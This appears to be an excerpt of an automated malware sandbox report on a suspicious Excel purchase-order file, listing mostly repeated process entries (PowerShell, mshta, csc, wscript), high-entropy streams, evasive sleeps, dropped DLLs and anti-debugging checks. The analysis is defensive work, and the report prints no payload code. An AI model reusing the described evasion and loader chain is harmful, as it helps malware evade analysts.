Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: PO#BBGR2411PO69.xls	Stream path 'MBD007009DB/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: PO#BBGR2411PO69.xls	Stream path 'Workbook' entropy: 7.99849766453 (max. 8.0)
Source: 09230000.0.dr	Stream path 'MBD007009DB/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: 09230000.0.dr	Stream path 'Workbook' entropy: 7.99844135628 (max. 8.0)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 27_2_00AC0101 rdtsc

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1536	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8392	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1166	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7777	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1270
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1565
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1421
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6156

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.dll			Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\mshta.exe TID: 3704	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888	Thread sleep count: 1536 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888	Thread sleep count: 8392 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3924	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2052	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080	Thread sleep time: -3600000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3156	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 748	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1316	Thread sleep count: 1270 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1316	Thread sleep count: 1565 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2148	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1212	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2176	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1132	Thread sleep count: 1421 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1132	Thread sleep count: 6156 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3572	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3616	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3572	Thread sleep time: -3000000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3572	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1872	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 3768	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 3716	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 27_2_00AC0101 rdtsc

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 27_2_00A707AC NtCreateMutant,LdrInitializeThunk,

27_2_00A707AC

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A60080 mov ecx, dword ptr fs:[00000030h]	27_2_00A60080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A600EA mov eax, dword ptr fs:[00000030h]	27_2_00A600EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A826F8 mov eax, dword ptr fs:[00000030h]	27_2_00A826F8

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
